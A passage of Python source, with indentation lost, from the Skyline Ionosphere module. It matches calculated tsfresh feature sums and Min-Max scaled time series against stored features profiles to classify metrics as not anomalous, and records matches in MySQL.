# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_calculated_features = calculated_features
if check_type == 'ionosphere_echo_check':
use_calculated_features = echo_calculated_features
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
calc_features_by_id = []
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# for feature_name, calc_value in calculated_features:
for feature_name, calc_value in use_calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
# Determine the sum of each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive
# Sum fp values, Sum calculated - handle negatives like features_sum :: -3389570699080000.0000000000
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive postive_sums
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
try:
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between common features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different')
continue
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
use_percent_similar = float(settings.IONOSPHERE_ECHO_FEATURES_PERCENT_SIMILAR)
except:
use_percent_similar = 2.0
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < use_percent_similar:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check - not anomalous with fp id %s for %s' % (str(fp_id), base_name))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<mertic_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
# @added 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Explicitly set the fp_id_metric_ts_object so it
# always exists to be evaluated
fp_id_metric_ts_object = None
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
if python_version == 2:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
else:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
# @modified 20200501 - Branch #3262: py3
# This is not an error if the data does not exist in
# memcache, it can be expected not to exists in
# memcache if it has not be used in a while.
# logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
logger.info('did not get %s from memcache, will query DB' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
# @modified 20200421 - Task #3304: py3 - handle pymemcache bytes not str
# Wrapped in try and except
try:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to literal_eval the fp_id_metric_ts_object in minmax_check')
fp_id_metric_ts = []
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere_echo_check':
anomaly_json = redis_anomaly_json
if not echo_anomalous_timeseries:
try:
with open((redis_anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
echo_anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(echo_anomalous_timeseries) > 0:
logger.info('echo_anomalous_timeseries was populated from anomaly json %s with %s data points from for creating the minmax_anomalous_ts' % (redis_anomaly_json, str(len(echo_anomalous_timeseries))))
else:
logger.error('error :: echo_anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % redis_anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create echo_anomalous_timeseries from anomaly json %s' % redis_anomaly_json)
else:
logger.info('echo_anomalous_timeseries has %s data points from for creating the minmax_anomalous_ts' % (str(len(echo_anomalous_timeseries))))
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if anomalous_timeseries_not_defined:
if anomalous_timeseries_not_defined and check_type == 'ionosphere':
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
del raw_timeseries
anomalous_timeseries = literal_eval(timeseries_array_str)
del timeseries_array_str
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points from for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
if check_type == 'ionosphere':
logger.info('anomalous_timeseries has %s data points from for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
if check_type == 'ionosphere':
use_anomalous_timeseries = anomalous_timeseries
if check_type == 'ionosphere_echo_check':
use_anomalous_timeseries = echo_anomalous_timeseries
anomalous_ts_values_count = len(use_anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
lower_range_not_same = True
try:
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not calculate range similarity with the current anomalous_timeseries and the fp id %s time series' % (str(fp_id)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly Min-Max scaling will be skipped')
minmax_fp_ts = []
# if fp_id_metric_ts:
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
try:
minmax_anomalous_values = [x2[1] for x2 in use_anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine np_minmax with current time series anomalous_timeseries and fp id %s time series' % (str(fp_id)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# tsf_settings = ReasonableFeatureExtractionSettings()
# tsf_settings.disable_progressbar = True
minmax_fp_features_sum = None
minmax_anomalous_features_sum = None
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
del datapoints
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
del converted
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_features from %s' % (str(minmax_fp_ts_csv)))
del df
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
del df_t
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to created df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
del datapoints
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
del converted
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# df, column_id='metric', column_sort='timestamp', column_kind=None,
# column_value=None, feature_extraction_settings=tsf_settings)
df, default_fc_parameters=EfficientFCParameters(),
column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, disable_progressbar=True)
del df
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
del df_t
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
try:
fp_sum_array = [minmax_fp_features_sum]
calc_sum_array = [minmax_anomalous_features_sum]
percent_different = 100
sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different from minmax scaled features sums')
if percent_different:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
mm_use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
mm_use_percent_similar = float(settings.IONOSPHERE_ECHO_MINMAX_SCALING_FEATURES_PERCENT_SIMILAR)
except:
mm_use_percent_similar = 3.5
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < mm_use_percent_similar:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(mm_use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check :: not anomalous - minmax scaled features profile match - %s' % (base_name))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
# Created time series resources for graphing in
# the matched page
try:
if os.path.isfile(minmax_fp_ts_csv):
self.remove_metric_check_file(str(minmax_fp_ts_csv))
except:
pass
try:
if os.path.isfile(minmax_fp_fname_out):
self.remove_metric_check_file(str(minmax_fp_fname_out))
except:
pass
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Clean up echo files
if echo_check:
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
try:
if os.path.isfile(echo_calculated_feature_file):
self.remove_metric_check_file(str(echo_calculated_feature_file))
except:
pass
echo_features_file = '%s/%s.%s.echo.fp.details.txt' % (metric_training_data_dir, str(metric_timestamp), base_name)
try:
if os.path.isfile(echo_features_file):
self.remove_metric_check_file(str(echo_features_file))
except:
pass
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous.append(base_name)
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# If there are additional echo fps then the database can be
# updated with the fp_count_with_echo value for fp_count in
# the ionosphere_matched table
if fp_count_with_echo > fp_count:
fp_count = fp_count_with_echo
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with with timestamp %s' % (
